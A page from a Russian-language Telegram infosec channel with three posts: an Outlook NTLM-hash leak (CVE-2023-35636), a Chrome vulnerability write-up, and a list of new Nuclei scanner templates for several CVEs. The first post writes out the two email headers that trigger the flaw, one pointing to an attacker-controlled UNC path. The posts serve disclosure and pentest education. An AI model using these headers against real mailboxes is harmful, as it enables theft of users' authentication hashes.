Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.94K photos
105 videos
166 files
2.96K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://yangx.top/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
加入频道
😂 CVE-2023-35636

Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.

К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.

Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.

📌 Те самые заголовки Outlook:

"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics


#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
😳CVE-2023-5480 в деталях: история одной уязвимости в Google Chrome за 16000$

Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.

📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.

👉 Читать

#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍63🥰3
🛠 Шаблоны Nuclei в январе 2024: что нового для этичного хакера

⚡️ За месяц команда ProjectDiscovery и сообщество написали 157 новых шаблонов Nuclei, из которых 36 CVE и 75 для сканирования багов, связанных с локальным повышением привилегий:

CVE-2023-22527: Atlassian Confluence — Remote Code Execution
CVE-2023-44353: Adobe ColdFusion WDDX Deserialization Gadgets
CVE-2023-51467: Apache OFBiz < 18.12.11 — Remote Code Execution
CVE-2023-7028: GitLab — Account Takeover via Password Reset
CVE-2024-0204: Fortra GoAnywhere MFT — Authentication Bypass
CVE-2024-23897: Jenkins < 2.441 — Arbitrary File Read
CVE-2023-50917: MajorDoMo thumb.php — OS Command Injection
CVE-2023-46805: Ivanti ICS — Authentication Bypass
CVE-2023-47211: ManageEngine OpManager — Directory Traversal
CVE-2023-6063: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection

#news #pentest #bugbounty #CVE
🔥5